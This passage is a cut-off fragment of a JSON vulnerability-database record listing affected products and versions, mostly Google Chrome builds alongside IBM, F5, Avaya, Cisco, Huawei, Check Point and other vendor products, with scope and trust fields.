"eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1047" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1052" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.78" }, { "model": "gaia r70.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1690.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.687.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.308" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.820.0" }, { "model": "associates user activity reporting module", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1044.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.109" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "infosphere balanced warehouse c3000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.432.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.731.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.89" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.560.0" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.819.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.324.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1048" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1032.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.162" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.433.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.201" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.153" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.201" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1687.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.903.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.733.0" }, { "model": "gaia r76", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "vsphere storage appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.3" }, { "model": "t610 plus flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.749.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.113" }, { "model": "ediscovery identification and collection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.762.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.719.0" }, { "model": "siem enterprise security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.12" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.72" }, { "model": "secureplatform r70.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.271.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.813.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.7" }, { "model": "oceanstor dorado5100 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.237" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.211" }, { "model": "oceanstor s2600t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.673.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.622.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1063.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.187" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.383.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.790.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.465.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.319" }, { "model": "esight uc\u0026c v100r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.658.1" }, { "model": "vcenter server appliance patch", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.8" }, { "model": "fusionmanager v100r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.37" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "secureplatform r70.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.932.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.101" }, { "model": "oceanstor s6800t v100r005c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1064.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.0" }, { "model": "power hmc r7.8.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "vcenter converter standalone", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1651.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.6" }, { "model": "espace u2990 v200r001c10spc102", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1003.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.391.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.107" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1664.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.18" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "ios-xe for catalyst air-ct5760", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual pgw softswitch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "22000" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7238" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.2" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.755.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1031" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.18" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4" }, { "model": "pod orchestration suite", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "elog v100r003c01spc506", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1007.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.326.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1680.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.11" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.213" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.23" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1010" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.113" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.337" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.28" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.1" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7530061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.29" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.3" }, { "model": "phaser", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78000" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.37" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1051" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.98" }, { "model": "oceanstor s5500t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "secureplatform r71.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.896.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.59" }, { "model": "secureplatform r71", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "secureplatform r70.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "socialcast on premise", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.152" }, { "model": "e6000 blade server bh620 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.417.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.218" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.334" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.657.0" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.0" }, { "model": "isoc v200r001c02spc203", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1049" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7242" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.331" }, { "model": "secureplatform r71.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.4" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9393" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1057" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1673.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.689.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.55" }, { "model": "qradar incident forensics mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1288.0" }, { "model": "gtsoftx3000 v200r001c01spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.390.0" }, { "model": "rack server rh2485 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1655.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.707.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.76" }, { "model": "secureplatform r70.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "gaia r75.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "algo one managed data service on cloud", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1081.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1011.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1067.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1664.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "oceanstor vis6600 v100r002c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.801.0" }, { "model": "nexus running nxos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1048.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.807.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.865.0" }, { "model": "espace cad v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1296.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.481.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.489.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.9" }, { "model": "vcenter converter standalone", "scope": "eq", "trust": 0.3, "vendor": "vmware", 